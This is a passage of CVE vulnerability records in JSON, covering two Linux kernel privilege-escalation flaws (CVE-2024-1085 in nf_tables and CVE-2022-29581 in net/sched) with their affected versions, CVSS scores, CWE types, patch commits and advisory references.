          "url": "http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
        },
        {
          "name": "20191108 [slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Nov/11"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
        },
        {
          "name": "RHSA-2020:0174",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0174"
        },
        {
          "name": "RHSA-2020:0204",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0204"
        },
        {
          "name": "RHSA-2020:0328",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0328"
        },
        {
          "name": "RHSA-2020:0339",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0339"
        },
        {
          "name": "RHSA-2020:0374",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0374"
        },
        {
          "name": "RHSA-2020:0375",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0375"
        },
        {
          "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
        },
        {
          "name": "RHSA-2020:0653",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0653"
        },
        {
          "name": "RHSA-2020:0661",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0661"
        },
        {
          "name": "RHSA-2020:0664",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0664"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2019-14816",
    "datePublished": "2019-09-20T18:25:15",
    "dateReserved": "2019-08-10T00:00:00",
    "dateUpdated": "2024-08-05T00:26:39.113Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2024-1085
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2024-08-01 18:26
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T18:26:30.459Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.8",
              "status": "affected",
              "version": "5.13",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Lonial Con"
        }
      ],
      "datePublic": "2024-01-17T11:02:49+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability.\n\nWe recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-31T12:14:32.429Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
        },
        {
          "url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2024-1085",
    "datePublished": "2024-01-31T12:14:32.429Z",
    "dateReserved": "2024-01-30T20:04:08.623Z",
    "dateUpdated": "2024-08-01T18:26:30.459Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-29581
Vulnerability from cvelistv5
Published
2022-05-17 16:50
Modified
2024-08-03 06:26
Severity
Summary
Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions.
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T06:26:06.284Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8"
          },
          {
            "name": "[oss-security] 20220518 CVE-2022-29581: Linux kernel cls_u32 UAF",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2022/05/18/2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220629-0005/"
          },
          {
            "name": "DSA-5173",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5173"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.18",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            },
            {
              "lessThan": "unspecified",
              "status": "affected",
              "version": "4.14",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "syzbot \u003csyzkaller@googlegroups.com\u003e"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-911",
              "description": "CWE-911 Improper Update of Reference Count",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-30T16:06:25",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8"
        },
        {
          "name": "[oss-security] 20220518 CVE-2022-29581: Linux kernel cls_u32 UAF",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2022/05/18/2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220629-0005/"
        },
        {
          "name": "DSA-5173",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5173"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-29581",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "5.18"
                          },
                          {
                            "version_affected": "\u003e=",
                            "version_value": "4.14"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "syzbot \u003csyzkaller@googlegroups.com\u003e"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-911 Improper Update of Reference Count"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8"
            },
            {
              "name": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8",
              "refsource": "MISC",
              "url": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8"
            },
            {
              "name": "[oss-security] 20220518 CVE-2022-29581: Linux kernel cls_u32 UAF",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2022/05/18/2"
            },
            {
              "name": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220629-0005/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220629-0005/"
            },
            {
              "name": "DSA-5173",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5173"
            },
            {
              "name": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-29581",
    "datePublished": "2022-05-17T16:50:12",
    "dateReserved": "2022-04-22T00:00:00",
    "dateUpdated": "2024-08-03T06:26:06.284Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}